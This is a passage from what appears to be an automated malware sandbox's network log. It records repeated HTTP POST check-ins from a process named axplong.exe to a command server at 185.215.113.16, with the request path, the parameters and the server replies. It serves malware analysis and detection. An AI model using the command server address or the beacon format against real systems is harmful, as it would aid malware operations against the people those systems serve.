                      Date: Sat, 27 Jul 2024 07:35:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      34192.168.2.649757185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:43.305984974 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:44.055516958 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:44.056828022 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:44.306009054 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      35192.168.2.649758185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:44.415997028 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:45.193861961 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:45.194870949 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:45.441298962 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      36192.168.2.649759185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:45.557847023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:46.307174921 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:46.307948112 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:46.558394909 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      37192.168.2.649760185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:46.681365013 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:47.552406073 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:47.553220987 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:47.800590038 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      38192.168.2.649761185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:47.915712118 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:48.660119057 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:48.662208080 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:48.908530951 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      39192.168.2.649762185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:49.025408030 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:49.774312973 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:49.775111914 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:50.024039030 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      40192.168.2.649763185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:50.134265900 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:51.257580042 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:51.258460999 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:51.258527994 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:51.511944056 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      41192.168.2.649764185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:51.634604931 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:52.373470068 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:52.376091003 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:52.621944904 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      42192.168.2.649765185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:52.744641066 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:53.527568102 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:53.528465033 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:53.781541109 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      43192.168.2.649766185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:53.902306080 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:54.759404898 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:54.760112047 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:55.006926060 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      44192.168.2.649767185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:55.121442080 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:55.870734930 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:55.871516943 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:56.121731043 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      45192.168.2.649768185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:56.246049881 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:57.011584044 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:57.012387037 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
